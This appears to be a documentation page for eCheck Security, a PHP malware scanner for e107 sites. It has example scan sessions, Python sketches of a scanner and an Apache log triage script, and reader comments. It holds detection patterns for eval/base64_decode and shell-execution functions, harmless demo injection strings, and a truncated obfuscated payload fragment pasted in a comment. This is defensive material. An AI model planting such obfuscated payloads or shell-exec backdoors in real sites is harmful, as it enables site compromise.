eCheck Security is a tiny tool for detecting malicious PHP scripts and code fragments on your website. It was originally built to check e107 CMS based sites, but it can actually be used on any kind of PHP-based project.
This tool is licensed under GNU General Public License - http://www.gnu.org/licenses/gpl.txt
Before you start using the tool, I have to warn you - DON'T PANIC when you first see the 'suspicious' results. Be sure you read the 'Analyzing the results' chapter.
Download the most recent version of eCheck Security here
Shell script (echeck.php)
Copy echeck.php somewhere on your server. In this example I'm copying it in /home/secretr/
[secretr@SecretR /]$ cd /home/secretr/
[secretr@SecretR ~]$ ./echeck.php -v
eCheck 1.0 beta
Report issues or get help on http://free-source.net or irc://irc.freenode.org/e107
[secretr@SecretR ~]$
You can always get quick help:
[secretr@SecretR ~]$ ./echeck.php -v
eCheck 1.0 beta
Report issues or get help on http://free-source.net or irc://irc.freenode.org/e107
[secretr@SecretR ~]$ ./echeck.php -h
This is a command line PHP script for checking for/cleaning PHP malicious code.
Usage: ./echeck.php [options] /path/to/wwwroot
Options:
  -v          Script version
  -I          Output a list with infected files only
  -S          Output a list with suspected files only
  -C          Clean files (MAKE A BACKUP BEFORE DOING THIS), confirmation is required
  -r number   Directory depth level
[secretr@SecretR ~]$
Now, the only thing you need to know is the path to your web root (the e107 root for e107 users). In my case this is /home/secretr/public_html and my e107 installation is located in the e107_0.7 folder. There are two alternatives. You could let eCheck know the path to your web root:
$ ./echeck.php -I -S ./public_html/e107_0.7/
or the opposite - navigate to the web root and call the script with the proper path:
[secretr@SecretR ~]$ cd public_html/e107_0.7/
[secretr@SecretR e107_0.7]$ /home/secretr/./echeck.php -I -S ./
Here is the output of an eCheck scan on a fresh e107 v0.7 CVS copy:
[secretr@SecretR ~]$ ./echeck.php -I -S -r 10 ./public_html/e107_0.7/
Directory depth set to 10
./public_html/e107_0.7/backend.php...SUSPECTED (shell execution)
./public_html/e107_0.7/e107_plugins/pdf/pdf.sc...SUSPECTED (shell execution)
./public_html/e107_0.7/e107_handlers/resize_handler.php...SUSPECTED (shell execution)
Files checked: 1040
Files suspected: 3
Files infected: 0
Files cleaned: 0
Clean errors: 0
Clean warnings: 0
NOTE: SUSPECTED DOES NOT MEAN INFECTED! DIFF AGAINST TRUSTED COPY OF SUSPECTED FILES TO BE SURE EVERYTHING IS OK. SUSPECTED FILES ARE NOT CLEANED!
[secretr@SecretR ~]$
There is a (still experimental) cleanup option you could try if eCheck finds files marked as INFECTED. I recommend making a backup of your files first. Additionally, you need write permission on all checked files (e.g. run eCheck as root) and your PHP version should be at least 5.0.
I'll put infected and genuinely malicious files inside my local e107 system to show you what happens:
[secretr@SecretR ~]$ ./echeck.php -C -I -S ./public_html/e107_0.7/
Directory depth set to 100
Did you make a backup? Be sure you did it! Type 'yes' to continue:
You need to confirm (type yes and press enter) to continue the operation.
[secretr@SecretR ~]$ ./echeck.php -C -I -S ./public_html/e107_0.7/
Directory depth set to 100
Did you make a backup? Be sure you did it! Type 'yes' to continue: yes
./public_html/e107_0.7/echeckwww.php...SUSPECTED (eval/base64_decode found)
./public_html/e107_0.7/backend.php...SUSPECTED (shell execution)
./public_html/e107_0.7/index.php...INFECTED...CLEANED
./public_html/e107_0.7/e107_plugins/pdf/pdf.sc...SUSPECTED (shell execution)
./public_html/e107_0.7/e107_files/public/shell.php...SUSPECTED (eval/base64_decode found)
./public_html/e107_0.7/e107_handlers/resize_handler.php...SUSPECTED (shell execution)
Files checked: 1043
Files suspected: 5
Files infected: 1
Files cleaned: 1
Clean errors: 0
Clean warnings: 0
NOTE: SUSPECTED DOES NOT MEAN INFECTED! DIFF AGAINST TRUSTED COPY OF SUSPECTED FILES TO BE SURE EVERYTHING IS OK. SUSPECTED FILES ARE NOT CLEANED!
[secretr@SecretR ~]$
Our index.php was infected with a known infection, so eCheck was able to clean it. Note that we have one new line - './public_html/e107_0.7/e107_files/public/shell.php'. We'll talk about this one later.
One last example - let's execute eCheck as root (your current user should be a sudoer), output everything (all checked files) and write the output to a file, log.txt in our case.
[secretr@SecretR ~]$ sudo ./echeck.php ./public_html/e107_0.7/ > ./log.txt
[secretr@SecretR ~]$ cat log.txt | more
Directory depth set to 100
./public_html/e107_0.7/install_.php....CHECKING...OK
./public_html/e107_0.7/user.php....CHECKING...OK
./public_html/e107_0.7/rate.php....CHECKING...OK
./public_html/e107_0.7/search.php....CHECKING...OK
./public_html/e107_0.7/online.php....CHECKING...OK
./public_html/e107_0.7/fpw.php....CHECKING...OK
./public_html/e107_0.7/print.php....CHECKING...OK
./public_html/e107_0.7/upload.php....CHECKING...OK
./public_html/e107_0.7/page.php....CHECKING...OK
./public_html/e107_0.7/links.php....CHECKING...OK
./public_html/e107_0.7/e107_languages/English/lan_notify.php....CHECKING...OK
./public_html/e107_0.7/e107_languages/English/lan_np.php....CHECKING...OK
./public_html/e107_0.7/e107_languages/English/lan_usersettings.php....CHECKING...OK
./public_html/e107_0.7/e107_languages/English/lan_membersonly.php....CHECKING...OK
./public_html/e107_0.7/e107_languages/English/lan_sitelinks.php....CHECKING...OK
./public_html/e107_0.7/e107_languages/English/lan_upload_handler.php....CHECKING...OK
./public_html/e107_0.7/e107_languages/English/lan_fpw.php....CHECKING...OK
./public_html/e107_0.7/e107_languages/English/lan_download.php....CHECKING...OK
--More--
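To make the scan and clean runs above concrete, here is a small Python scanner written for this page as an added example (it is not eCheck's own code, and eCheck's real signature list is not reproduced here). It walks a web root to a depth limit like -r, labels every PHP file OK, SUSPECTED (eval/base64_decode or a shell-execution function found) or INFECTED, reports the same counts as eCheck's footer, and strips only a constructed demo injection signature after writing a .bak copy; SUSPECTED files are never modified. The directory tree, file contents and the "known infection" signature are all constructed for the example.

```python
import os
import re
import shutil
import tempfile

# Heuristics reported as SUSPECTED: generic PHP functions that legitimate
# code (image resizing, PDF generation) also calls, hence the false positives.
SUSPECT_PATTERNS = {
    "eval/base64_decode found": re.compile(r"\beval\s*\(\s*base64_decode\s*\(", re.I),
    "shell execution": re.compile(
        r"\b(?:exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I),
}

# Constructed stand-in for a "known infection" (assumption: eCheck's real
# signatures are not on the page). The base64 payload decodes to  echo "demo";
INFECTION_SIGNATURE = re.compile(
    r"<\?php /\*demo-injection\*/ eval\(base64_decode\('ZWNobyAiZGVtbyI7'\)\); \?>\n?")

PHP_EXTENSIONS = (".php", ".inc", ".sc")   # .sc included because of pdf.sc above

def classify_source(source):
    """Return (status, reason); INFECTED outranks SUSPECTED outranks OK."""
    if INFECTION_SIGNATURE.search(source):
        return "INFECTED", "known injection"
    for reason, pattern in SUSPECT_PATTERNS.items():
        if pattern.search(source):
            return "SUSPECTED", reason
    return "OK", None

def scan_tree(root, max_depth=100):
    """Walk root at most max_depth directory levels deep (like -r) and return
    a sorted list of (relative_path, status, reason)."""
    root = os.path.abspath(root)
    results = []
    for dirpath, dirnames, filenames in os.walk(root):
        depth = dirpath[len(root):].count(os.sep)
        if depth >= max_depth:
            dirnames[:] = []            # stop descending below this level
        for name in filenames:
            if not name.endswith(PHP_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                status, reason = classify_source(fh.read())
            results.append((os.path.relpath(full, root), status, reason))
    return sorted(results)

def summary(results):
    """Counts in the shape of eCheck's footer lines."""
    return {
        "checked": len(results),
        "suspected": sum(1 for _, s, _ in results if s == "SUSPECTED"),
        "infected": sum(1 for _, s, _ in results if s == "INFECTED"),
    }

def clean_file(path):
    """Remove the known signature from an INFECTED file after saving a .bak
    copy. Returns True if the file changed. SUSPECTED files are never touched:
    a heuristic match alone does not prove the code is malicious."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        original = fh.read()
    cleaned, count = INFECTION_SIGNATURE.subn("", original)
    if count == 0:
        return False
    shutil.copy2(path, path + ".bak")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(cleaned)
    return True

def build_demo_tree():
    """Create a constructed miniature web root in a temp directory."""
    root = tempfile.mkdtemp(prefix="echeck_demo_")
    files = {
        "user.php": "<?php echo 'hello'; ?>\n",
        "e107_handlers/resize_handler.php":
            "<?php $out = shell_exec('convert -resize 100x100 in.png out.png'); ?>\n",
        "e107_plugins/pdf/pdf.sc": "<?php passthru('ps2pdf in.ps out.pdf'); ?>\n",
        "index.php":
            "<?php /*demo-injection*/ eval(base64_decode('ZWNobyAiZGVtbyI7')); ?>\n"
            "<?php require_once('class2.php'); ?>\n",
        # dropped-in script; the payload here is just the word "placeholder"
        "e107_files/public/shell.php":
            "<?php eval(base64_decode('cGxhY2Vob2xkZXI=')); ?>\n",
        "deep/a/b/c/d/hidden.php": "<?php system('ls'); ?>\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    demo_root = build_demo_tree()
    found = scan_tree(demo_root, max_depth=10)
    for rel, status, reason in found:
        print(f"{rel}...{status}" + (f" ({reason})" if reason else ""))
    print(summary(found))
    for rel, status, _ in found:
        if status == "INFECTED" and clean_file(os.path.join(demo_root, rel)):
            print(f"{rel}...CLEANED (backup in {rel}.bak)")
```

Running it prints a report in the same shape as the sessions above: the resize handler, the PDF plugin and the deep hidden.php come out SUSPECTED (shell execution), shell.php SUSPECTED (eval/base64_decode found), index.php INFECTED and then CLEANED, user.php OK. Scanning with max_depth=2 skips hidden.php entirely, which is exactly why a low -r value can hide a dropped-in file.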
Scan via a browser (echeckwww.php)
For those who don't have shell access to their sites (most common case for shared hosting) there is an alternative.
Copy echeckwww.php to your site root (in my case /home/secretr/public_html/e107_0.7/) and just open it in your favorite browser like this:
You should see something like this: [screenshot of the echeckwww.php results page]
Keep in mind that you don't have any options you can set in this case. Auto-clean is not available either.
Analyzing the results
Scripts are analyzed in two ways:
Suspected doesn't mean the files are infected in some way. Most of the flagged phrases (generic PHP functions) are used in all kinds of software. Analyzing the results is your responsibility. If you know the structure of your site and have a general idea of what happens where, it will be easy to identify the problems (if there are any).
I'll use the example above, more precisely this line from our latest shell example:
./public_html/e107_0.7/e107_files/public/shell.php...SUSPECTED (eval/base64_decode found)
Every e107 user should know that the /e107_files/public/ folder should not contain any scripts. Experienced admins will know what to do from here: check the file's last-modified date and investigate the Apache logs to find out how this file was uploaded to the server, and eventually report the problem to the e107 core team.
On the other hand, we see the
./public_html/e107_0.7/backend.php...SUSPECTED (shell execution)
./public_html/e107_0.7/e107_plugins/pdf/pdf.sc...SUSPECTED (shell execution)
./public_html/e107_0.7/e107_handlers/resize_handler.php...SUSPECTED (shell execution)
lines appearing again and again. These are the false positives I'm talking about. You'll have many of them on a live site with a lot of 3rd-party code. You just need to investigate everything you see - it's pretty easy to distinguish malicious code from creative code.
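The triage step described above for the shell.php case (check the suspect file's last-modified time, then look in the Apache logs for the request that dropped it) can be scripted. The following Python is an added example written for this page, not part of eCheck: it parses combined-format access log lines, keeps the requests within a window around the file's mtime, and separates write requests (POST/PUT) that precede the mtime from the first fetch of the new file afterwards. The log lines, client addresses and timestamps are constructed sample data; SUSPECT_MTIME stands in for the real file's mtime, and file_mtime shows how you would obtain it on a live server.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" format up to the response size; referer and UA are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# Constructed sample log (RFC 5737 documentation addresses, invented times).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2000:13:55:36 -0700] "GET /news.php HTTP/1.1" 200 5123',
    '203.0.113.7 - - [10/Oct/2000:13:57:02 -0700] "GET /upload.php HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Oct/2000:13:57:09 -0700] "POST /upload.php HTTP/1.1" 302 0',
    '203.0.113.7 - - [10/Oct/2000:13:57:41 -0700] "GET /e107_files/public/shell.php HTTP/1.1" 200 91',
    '198.51.100.2 - - [10/Oct/2000:13:58:00 -0700] "GET /index.php HTTP/1.1" 200 6210',
    '198.51.100.2 - - [10/Oct/2000:15:30:00 -0700] "POST /comment.php HTTP/1.1" 200 1200',
    'this line is not in the expected format',
]
# Constructed mtime of the suspect file, one second after the POST above.
SUSPECT_MTIME = datetime(2000, 10, 10, 13, 57, 10, tzinfo=timezone(timedelta(hours=-7)))

def file_mtime(path):
    """Timezone-aware last-modified time of a real file; on a live server this
    replaces the constructed SUSPECT_MTIME."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)

def parse_log_line(line):
    """Parse one combined-format line, or return None for lines that don't fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    return entry

def requests_near(lines, mtime, window=timedelta(minutes=10)):
    """Parsed requests within +/-window of mtime, oldest first."""
    hits = [e for e in map(parse_log_line, lines)
            if e is not None and abs(e["time"] - mtime) <= window]
    return sorted(hits, key=lambda e: e["time"])

def triage(lines, suspect_relpath, mtime, window=timedelta(minutes=10)):
    """Narrow the log down to what matters for one suspect file: write
    requests that precede its mtime, the first request that fetched the new
    file afterwards, and the client addresses involved."""
    near = requests_near(lines, mtime, window)
    target = "/" + suspect_relpath
    writes = [e for e in near if e["method"] in ("POST", "PUT") and e["time"] <= mtime]
    first_access = next((e for e in near
                         if e["path"].split("?", 1)[0] == target and e["time"] >= mtime), None)
    ips = {e["ip"] for e in writes}
    if first_access:
        ips.add(first_access["ip"])
    return {"window_hits": len(near), "write_candidates": writes,
            "first_access": first_access, "source_ips": sorted(ips)}

if __name__ == "__main__":
    report = triage(SAMPLE_LOG, "e107_files/public/shell.php", SUSPECT_MTIME)
    print(f"{report['window_hits']} requests within the window")
    for e in report["write_candidates"]:
        print(f"possible upload: {e['ip']} {e['method']} {e['path']} -> {e['status']} at {e['time']}")
    if report["first_access"]:
        fa = report["first_access"]
        print(f"first fetch of the new file: {fa['ip']} at {fa['time']}")
    print("client addresses to look at:", ", ".join(report["source_ips"]))
```

On the sample data the POST to /upload.php one second before the mtime is the only write candidate, and the same address fetches the new shell.php half a minute later, which is the pattern you want to confirm or rule out before reporting. The log format assumed here is Apache's default combined format; adjust LOG_RE if your host uses a custom LogFormat.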
Where can I get help?
Excellent tool and just what I was looking for. Would also be good if it didn't just scan the e107 root folder but all virtual servers so it could be scheduled to run daily and send reports to server admin. Would also be good to be able to exclude files from scanning that we know are safe.
How many ways can a hacker upload their code to our website?
eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZmZ 0MScpKXtmdW5jdGlvbiBmZnQxKCRzKXtpZihwcmVnX21h dGNoX2FsbCgnIzxzY3JpcHQoLio
I wonder why they can add the code to my website;
or they have my password, or they have another way to upload the code to my hosting.
Please guide me.